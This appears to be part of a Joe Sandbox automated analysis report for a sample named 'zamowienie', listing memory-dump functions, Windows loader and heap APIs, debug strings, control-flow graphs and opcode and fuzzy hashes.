                                                                                                                                              • Associated: 00000000.00000002.2469810438.0000000073404000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2469862791.0000000073406000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_73400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Global$AllocFree
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3394109436-0
                                                                                                                                              • Opcode ID: 9410fb65a587ef4007a2fa7dd5f041a35aea6c0b330589a729b3e02bf495593e
                                                                                                                                              • Instruction ID: 5418d0906872418b9afcf4855bcf838895121edd87fd6b3a163bba3c218be76b
                                                                                                                                              • Opcode Fuzzy Hash: 9410fb65a587ef4007a2fa7dd5f041a35aea6c0b330589a729b3e02bf495593e
                                                                                                                                              • Instruction Fuzzy Hash: 225170BA7043459FE70DDF65CA84B2A7BF8FB49244F1804E9E54AEB350E7309910CB59
                                                                                                                                              Function 00405EB6 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406111,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405EC6
                                                                                                                                              • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405EDE
                                                                                                                                              • CharNextA.USER32(00000000,?,00000000,00406111,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405EEF
                                                                                                                                              • lstrlenA.KERNEL32(00000000,?,00000000,00406111,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405EF8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 190613189-0
                                                                                                                                              • Opcode ID: 5cac60a44e2266709049edbfd25ede4b753d9409f8219a4c9632319a7255b88a
                                                                                                                                              • Instruction ID: 4ace56e23d5ac1e3a407fb50117488eac73a934bc2de81493ee403e7c119bc47
                                                                                                                                              • Opcode Fuzzy Hash: 5cac60a44e2266709049edbfd25ede4b753d9409f8219a4c9632319a7255b88a
                                                                                                                                              • Instruction Fuzzy Hash: 12F0F631104458FFC7029FA5CD00D9FBBA8EF15354B2540BAE940F7211D634EE01ABAD

                                                                                                                                              Execution Graph

                                                                                                                                              Execution Coverage:0%
                                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                                              Signature Coverage:100%
                                                                                                                                              Total number of Nodes:1
                                                                                                                                              Total number of Limit Nodes:0
                                                                                                                                              execution_graph 82143 34f32c70 LdrInitializeThunk

                                                                                                                                              Executed Functions

                                                                                                                                              Function 34F335C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 2 34f335c0-34f335cc LdrInitializeThunk
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                              • Opcode ID: f625390ffcaf392ed963ee43d7e3927541a4547b007509fff1633f6399e0ef11
                                                                                                                                              • Instruction ID: d622abef43a1e1dc7702050842f872105ea650d983bf8c39fa7ab117aa2abd15
                                                                                                                                              • Opcode Fuzzy Hash: f625390ffcaf392ed963ee43d7e3927541a4547b007509fff1633f6399e0ef11
                                                                                                                                              • Instruction Fuzzy Hash: 5290023564550413D1007158C51470614054BD0205F69C812A042553CD8BD5CA5665A3
                                                                                                                                              Function 34F32C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 0 34f32c70-34f32c7c LdrInitializeThunk
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                              • Opcode ID: d22a9af74de35115abca7372f30723bc902f6866c329b834ca3c1bd3c7a67da0
                                                                                                                                              • Instruction ID: 5ba91059b7fb922ac0f5f342a48566941a83976a20d4ba3d4fa2e36b144e05c0
                                                                                                                                              • Opcode Fuzzy Hash: d22a9af74de35115abca7372f30723bc902f6866c329b834ca3c1bd3c7a67da0
                                                                                                                                              • Instruction Fuzzy Hash: CE90023524148813D1107158C40474A04054BD0305F5DC812A442562CD8AD5C9967122
                                                                                                                                              Function 34F32DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 1 34f32df0-34f32dfc LdrInitializeThunk
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                              • Opcode ID: 2b6d1e2c6ed4c8781addc3f245f31a270cdff5efd78001fbabf24439fb15343a
                                                                                                                                              • Instruction ID: 150e11130f7b6cbb43ffb9686b4a27ec9c8fc138289e94a00b83f4424c5cb098
                                                                                                                                              • Opcode Fuzzy Hash: 2b6d1e2c6ed4c8781addc3f245f31a270cdff5efd78001fbabf24439fb15343a
                                                                                                                                              • Instruction Fuzzy Hash: C990023524140423D1117158C50470704094BD0245F99C813A042552CD9A96CA57A122

                                                                                                                                              Non-executed Functions

                                                                                                                                              Function 34FAFCAB Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 96 34fafcab-34fafcc3 GetPEB 97 34fafce2-34fafce3 call 34eeb970 96->97 98 34fafcc5-34fafce0 GetPEB call 34eeb970 96->98 102 34fafce8-34fafd0a call 34eeb970 97->102 98->102 105 34fafd0c 102->105 106 34fafd81-34fafd8a GetPEB 102->106 107 34fafd1a-34fafd1f 105->107 108 34fafd59-34fafd5e 105->108 109 34fafd7c 105->109 110 34fafd3d-34fafd42 105->110 111 34fafd52-34fafd57 105->111 112 34fafd13-34fafd18 105->112 113 34fafd36-34fafd3b 105->113 114 34fafd75-34fafd7a 105->114 115 34fafd4b-34fafd50 105->115 116 34fafd28-34fafd2d 105->116 117 34fafd6e-34fafd73 105->117 118 34fafd2f-34fafd34 105->118 119 34fafd60-34fafd65 105->119 120 34fafd21-34fafd26 105->120 121 34fafd67-34fafd6c 105->121 122 34fafd44-34fafd49 105->122 123 34fafda9-34fafdaa call 34eeb970 106->123 124 34fafd8c-34fafda7 GetPEB call 34eeb970 106->124 107->106 108->106 109->106 110->106 111->106 112->106 113->106 114->106 115->106 116->106 117->106 118->106 119->106 120->106 121->106 122->106 128 34fafdaf-34fafdca call 34eeb970 123->128 124->128 131 34fafdcc-34fafdd5 GetPEB 128->131 132 34fafe0d-34fafe13 128->132 135 34fafdd7-34fafdf2 GetPEB call 34eeb970 131->135 136 34fafdf4-34fafdf5 call 34eeb970 131->136 133 34fafe56-34fafe5c 132->133 134 34fafe15-34fafe1e GetPEB 132->134 137 34fafe5e-34fafe67 GetPEB 133->137 138 34fafe9f-34fafea5 133->138 141 34fafe3d-34fafe3e call 34eeb970 134->141 142 34fafe20-34fafe3b GetPEB call 34eeb970 134->142 145 34fafdfa-34fafe0c call 34eeb970 135->145 136->145 143 34fafe69-34fafe84 GetPEB call 34eeb970 137->143 144 34fafe86-34fafe87 call 34eeb970 137->144 147 34fafeaf-34fafeb8 GetPEB 138->147 148 34fafea7-34fafead 138->148 158 34fafe43-34fafe55 call 34eeb970 141->158 142->158 164 34fafe8c-34fafe9e call 34eeb970 143->164 144->164 145->132 154 34fafeba-34fafed5 GetPEB call 34eeb970 147->154 155 34fafed7-34fafed8 call 34eeb970 147->155 148->147 153 34fafef7-34faff00 GetPEB 148->153 162 34faff1f-34faff20 call 34eeb970 153->162 163 34faff02-34faff1d GetPEB call 34eeb970 153->163 169 34fafedd-34fafef4 call 34eeb970 154->169 155->169 158->133 176 34faff25-34faff3a call 34eeb970 162->176 163->176 164->138 169->153
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                                                                                                              • API String ID: 0-2897834094
                                                                                                                                              • Opcode ID: b78f58916d3c8563d746913b171d8577890473f062fc700b16e4092f880b2ce3
                                                                                                                                              • Instruction ID: 62daa4fa7ccd0dbb8d76f19a30e3dfed09f4536f63b96d7ee2e4e8c362d7097a
                                                                                                                                              • Opcode Fuzzy Hash: b78f58916d3c8563d746913b171d8577890473f062fc700b16e4092f880b2ce3
                                                                                                                                              • Instruction Fuzzy Hash: 2F618F73A36252DFE206DB54D485D3473E9EF08671B0D489AEA009F652CB35ACC28FE5
                                                                                                                                              Function 34F994E0 Relevance: 19.8, APIs: 8, Strings: 3, Instructions: 558timeCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 554 34f994e0-34f99529 555 34f99578-34f99587 554->555 556 34f9952b-34f99530 554->556 557 34f99534-34f9953a 555->557 558 34f99589-34f9958e 555->558 556->557 559 34f99540-34f99564 call 34f39020 557->559 560 34f99695-34f996bd call 34f39020 557->560 561 34f99d13-34f99d27 call 34f34c30 558->561 568 34f99593-34f99634 GetPEB call 34f9dc65 559->568 569 34f99566-34f99573 call 34fb972b 559->569 570 34f996dc-34f99712 560->570 571 34f996bf-34f996da call 34f99d2a 560->571 581 34f99652-34f99667 568->581 582 34f99636-34f99644 568->582 580 34f9967d-34f99690 RtlDebugPrintTimes 569->580 575 34f99714-34f99716 570->575 571->575 575->561 576 34f9971c-34f99731 RtlDebugPrintTimes 575->576 576->561 586 34f99737-34f9973e 576->586 580->561 581->580 585 34f99669-34f9966e 581->585 582->581 583 34f99646-34f9964b 582->583 583->581 587 34f99670 585->587 588 34f99673-34f99676 585->588 586->561 590 34f99744-34f9975f 586->590 587->588 588->580 591 34f99763-34f99774 call 34f9a808 590->591 594 34f9977a-34f9977c 591->594 595 34f99d11 591->595 594->561 596 34f99782-34f99789 594->596 595->561 597 34f998fc-34f99902 596->597 598 34f9978f-34f99794 596->598 599 34f99908-34f99937 call 34f39020 597->599 600 34f99a9c-34f99aa2 597->600 601 34f997bc 598->601 602 34f99796-34f9979c 598->602 616 34f99939-34f99944 599->616 617 34f99970-34f99985 599->617 605 34f99af4-34f99af9 600->605 606 34f99aa4-34f99aad 600->606 603 34f997c0-34f99811 call 34f39020 RtlDebugPrintTimes 601->603 602->601 607 34f9979e-34f997b2 602->607 603->561 643 34f99817-34f9981b 603->643 611 34f99ba8-34f99bb1 605->611 612 34f99aff-34f99b07 605->612 606->591 610 34f99ab3-34f99aef call 34f39020 606->610 613 34f997b8-34f997ba 607->613 614 34f997b4-34f997b6 607->614 635 34f99ce9 610->635 611->591 618 34f99bb7-34f99bba 611->618 620 34f99b09-34f99b0d 612->620 621 34f99b13-34f99b3d call 34f98513 612->621 613->603 614->603 622 34f9994f-34f9996e 616->622 623 34f99946-34f9994d 616->623 627 34f99991-34f99998 617->627 628 34f99987-34f99989 617->628 624 34f99c7d-34f99cb4 call 34f39020 618->624 625 34f99bc0-34f99c0a 618->625 620->611 620->621 640 34f99d08-34f99d0c 621->640 641 34f99b43-34f99b9e call 34f39020 RtlDebugPrintTimes 621->641 634 34f999d9-34f999f6 RtlDebugPrintTimes 622->634 623->622 652 34f99cbb-34f99cc2 624->652 653 34f99cb6 624->653 632 34f99c0c 625->632 633 34f99c11-34f99c1e 625->633 638 34f999bd-34f999bf 627->638 636 34f9998b-34f9998d 628->636 637 34f9998f 628->637 632->633 646 34f99c2a-34f99c2d 633->646 647 34f99c20-34f99c23 633->647 634->561 668 34f999fc-34f99a1f call 34f39020 634->668 648 34f99ced 635->648 636->627 637->627 644 34f9999a-34f999a4 638->644 645 34f999c1-34f999d7 638->645 640->591 641->561 683 34f99ba4 641->683 654 34f9986b-34f99880 643->654 655 34f9981d-34f99825 643->655 649 34f999ad 644->649 650 34f999a6 644->650 645->634 658 34f99c39-34f99c7b 646->658 659 34f99c2f-34f99c32 646->659 647->646 657 34f99cf1-34f99d06 RtlDebugPrintTimes 648->657 662 34f999af-34f999b1 649->662 650->645 660 34f999a8-34f999ab 650->660 663 34f99ccd 652->663 664 34f99cc4-34f99ccb 652->664 653->652 667 34f99886-34f99894 654->667 665 34f99852-34f99869 655->665 666 34f99827-34f99850 call 34f98513 655->666 657->561 657->640 658->657 659->658 660->662 669 34f999bb 662->669 670 34f999b3-34f999b5 662->670 671 34f99cd1-34f99cd7 663->671 664->671 665->667 673 34f99898-34f998ef call 34f39020 RtlDebugPrintTimes 666->673 667->673 686 34f99a3d-34f99a58 668->686 687 34f99a21-34f99a3b 668->687 669->638 670->669 677 34f999b7-34f999b9 670->677 678 34f99cd9-34f99cdc 671->678 679 34f99cde-34f99ce4 671->679 673->561 690 34f998f5-34f998f7 673->690 677->638 678->635 679->648 684 34f99ce6 679->684 683->611 684->635 688 34f99a5d-34f99a8b RtlDebugPrintTimes 686->688 687->688 688->561 692 34f99a91-34f99a97 688->692 690->640 692->618
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID: $ $0
                                                                                                                                              • API String ID: 3446177414-3352262554
                                                                                                                                              • Opcode ID: 6e5262ce5086726b3b41685aab11d04e5970201c4cb90069dce665a4cbd238d2
                                                                                                                                              • Instruction ID: ea471e50f826e52177fe0311ef6f62e14d251803ebf30eaa908d2c4e1cde04fd
                                                                                                                                              • Opcode Fuzzy Hash: 6e5262ce5086726b3b41685aab11d04e5970201c4cb90069dce665a4cbd238d2
                                                                                                                                              • Instruction Fuzzy Hash: 7432F2B16083818FE360CF68C984B9ABBE5BB88344F094D2EF59987350D775D94ACF52
                                                                                                                                              Function 34FA0274 Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 348timeCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 1297 34fa0274-34fa0296 call 34f47e54 1300 34fa0298-34fa02b0 RtlDebugPrintTimes 1297->1300 1301 34fa02b5-34fa02cd call 34ee76b2 1297->1301 1305 34fa0751-34fa0760 1300->1305 1306 34fa02d3-34fa02e9 1301->1306 1307 34fa06f7 1301->1307 1308 34fa02eb-34fa02ee 1306->1308 1309 34fa02f0-34fa02f2 1306->1309 1310 34fa06fa-34fa074e call 34fa0766 1307->1310 1311 34fa02f3-34fa030a 1308->1311 1309->1311 1310->1305 1313 34fa0310-34fa0313 1311->1313 1314 34fa06b1-34fa06ba GetPEB 1311->1314 1313->1314 1318 34fa0319-34fa0322 1313->1318 1316 34fa06d9-34fa06de call 34eeb970 1314->1316 1317 34fa06bc-34fa06d7 GetPEB call 34eeb970 1314->1317 1325 34fa06e3-34fa06f4 call 34eeb970 1316->1325 1317->1325 1322 34fa033e-34fa0351 call 34fa0cb5 1318->1322 1323 34fa0324-34fa033b call 34efffb0 1318->1323 1331 34fa035c-34fa0370 call 34ee758f 1322->1331 1332 34fa0353-34fa035a 1322->1332 1323->1322 1325->1307 1336 34fa05a2-34fa05a7 1331->1336 1337 34fa0376-34fa0382 GetPEB 1331->1337 1332->1331 1336->1310 1340 34fa05ad-34fa05b9 GetPEB 1336->1340 1338 34fa03f0-34fa03fb 1337->1338 1339 34fa0384-34fa0387 1337->1339 1341 34fa04e8-34fa04fa call 34f027f0 1338->1341 1342 34fa0401-34fa0408 1338->1342 1343 34fa0389-34fa03a4 GetPEB call 34eeb970 1339->1343 1344 34fa03a6-34fa03ab call 34eeb970 1339->1344 1345 34fa05bb-34fa05be 1340->1345 1346 34fa0627-34fa0632 1340->1346 1362 34fa0590-34fa059d call 34fa11a4 call 34fa0cb5 1341->1362 1363 34fa0500-34fa0507 1341->1363 1342->1341 1347 34fa040e-34fa0417 1342->1347 1359 34fa03b0-34fa03d1 call 34eeb970 GetPEB 1343->1359 1344->1359 1350 34fa05dd-34fa05e2 call 34eeb970 1345->1350 1351 34fa05c0-34fa05db GetPEB call 34eeb970 1345->1351 1346->1310 1348 34fa0638-34fa0643 1346->1348 1354 34fa0438-34fa043c 1347->1354 1355 34fa0419-34fa0429 1347->1355 1348->1310 1356 34fa0649-34fa0654 1348->1356 1370 34fa05e7-34fa05fb call 34eeb970 1350->1370 1351->1370 1366 34fa044e-34fa0454 1354->1366 1367 34fa043e-34fa044c call 34f23bc9 1354->1367 1355->1354 1364 34fa042b-34fa0435 call 34fadac6 1355->1364 1356->1310 1365 34fa065a-34fa0663 GetPEB 1356->1365 1359->1341 1391 34fa03d7-34fa03eb 1359->1391 1362->1336 1371 34fa0509-34fa0510 1363->1371 1372 34fa0512-34fa051a 1363->1372 1364->1354 1375 34fa0682-34fa0687 call 34eeb970 1365->1375 1376 34fa0665-34fa0680 GetPEB call 34eeb970 1365->1376 1378 34fa0457-34fa0460 1366->1378 1367->1378 1392 34fa05fe-34fa0608 GetPEB 1370->1392 1371->1372 1382 34fa0538-34fa053c 1372->1382 1383 34fa051c-34fa052c 1372->1383 1398 34fa068c-34fa06ac call 34f986ba call 34eeb970 1375->1398 1376->1398 1389 34fa0472-34fa0475 1378->1389 1390 34fa0462-34fa0470 1378->1390 1395 34fa053e-34fa0551 call 34f23bc9 1382->1395 1396 34fa056c-34fa0572 1382->1396 1383->1382 1393 34fa052e-34fa0533 call 34fadac6 1383->1393 1399 34fa0477-34fa047e 1389->1399 1400 34fa04e5 1389->1400 1390->1389 1391->1341 1392->1310 1402 34fa060e-34fa0622 1392->1402 1393->1382 1413 34fa0563 1395->1413 1414 34fa0553-34fa0561 call 34f1fe99 1395->1414 1401 34fa0575-34fa057c 1396->1401 1398->1392 1399->1400 1406 34fa0480-34fa048b 1399->1406 1400->1341 1401->1362 1408 34fa057e-34fa058e 1401->1408 1402->1310 1406->1400 1407 34fa048d-34fa0496 GetPEB 1406->1407 1411 34fa0498-34fa04b3 GetPEB call 34eeb970 1407->1411 1412 34fa04b5-34fa04ba call 34eeb970 1407->1412 1408->1362 1422 34fa04bf-34fa04dd call 34f986ba call 34eeb970 1411->1422 1412->1422 1420 34fa0566-34fa056a 1413->1420 1414->1420 1420->1401 1422->1400
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                              • API String ID: 3446177414-1700792311
                                                                                                                                              • Opcode ID: 123f15e8f2ebc85975deb2831b7db64399080e79e7e8603b3ed8790576e79350
                                                                                                                                              • Instruction ID: ea0d8d3d19039ac6fce4ac42796ec1f89be6aaeb91a6b08f85b7d4f2b2751907
                                                                                                                                              • Opcode Fuzzy Hash: 123f15e8f2ebc85975deb2831b7db64399080e79e7e8603b3ed8790576e79350
                                                                                                                                              • Instruction Fuzzy Hash: E8D1DE79910685DFEB06CF64E440AAEBBF1FF4A304F4C885DE845AB252C7359982CF54
                                                                                                                                              Function 34F9F525 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 231timeCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                                                                                              • API String ID: 3446177414-1745908468
                                                                                                                                              • Opcode ID: e8473f97dbf6c66dcafee958e1fd8b1f91c45902fb7cfba17eb9bed32e223006
                                                                                                                                              • Instruction ID: a14f9ffd4f4df626f52adf022c4245769920ade14baa661e7afbbc959558ba91
                                                                                                                                              • Opcode Fuzzy Hash: e8473f97dbf6c66dcafee958e1fd8b1f91c45902fb7cfba17eb9bed32e223006
                                                                                                                                              • Instruction Fuzzy Hash: A391DE76A10745DFEB05CF68C440AE9BBF2EF49314F18885DE445AB262CB369982CF64
                                                                                                                                              Function 34FA12ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                                                                                              • API String ID: 0-3591852110
                                                                                                                                              • Opcode ID: d74e50415587d5340c3879500c13922354f68982cf4932f86db677997df81789
                                                                                                                                              • Instruction ID: 33f38fb660849be2b4a5a928821f58dc7ce5c3d71c60872c203c35945cd91aa2
                                                                                                                                              • Opcode Fuzzy Hash: d74e50415587d5340c3879500c13922354f68982cf4932f86db677997df81789
                                                                                                                                              • Instruction Fuzzy Hash: 5812AB79600752DFE715DF28C640BBABBF5EF09314F4A8899E4968B642D734E882CF50
                                                                                                                                              Function 34EED34C Relevance: 11.6, Strings: 9, Instructions: 312COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
